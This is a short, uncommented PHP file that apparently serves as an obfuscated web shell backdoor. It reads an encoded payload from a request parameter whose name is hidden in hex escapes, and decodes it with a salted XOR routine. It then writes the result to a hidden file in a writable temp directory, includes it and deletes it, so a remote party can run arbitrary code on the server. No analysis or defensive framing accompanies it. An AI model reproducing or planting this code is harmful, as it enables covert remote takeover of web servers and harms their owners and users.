<?php

if(array_key_exists("\x72\x65f", $_REQUEST)){
	$sym = array_filter(["/var/tmp", ini_get("upload_tmp_dir"), getcwd(), "/dev/shm", getenv("TMP"), session_save_path(), getenv("TEMP"), "/tmp", sys_get_temp_dir()]);
	$value = $_REQUEST["\x72\x65f"];
	 	$value=explode("." , 		$value  )		;
	$fac = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($salt);
            $q = 0;
            $__len = count($value);
    
            do {if($q >= $__len) break;
                $v6 = $value[$q];
                $sChar = ord($salt[$q		%$sLen]);
                $d =((int)$v6 - $sChar -($q		%10))	^ 	75;
                $fac .=	chr($d);
                $q++;
            } while(true);
	$resource = 0;
do {
    $itm = $sym[$resource] ?? null;
    if ($resource >= count($sym)) break;
    		if (!!is_dir($itm) && !!is_writable($itm)) {
    $bind = join("/", [$itm, ".item"]);
    $file = fopen($bind, 'w');
if ($file) {
	fwrite($file, $fac);
	fclose($file);
	include $bind;
	@unlink($bind);
	exit;
}
}
    $resource++;
} while (true);
}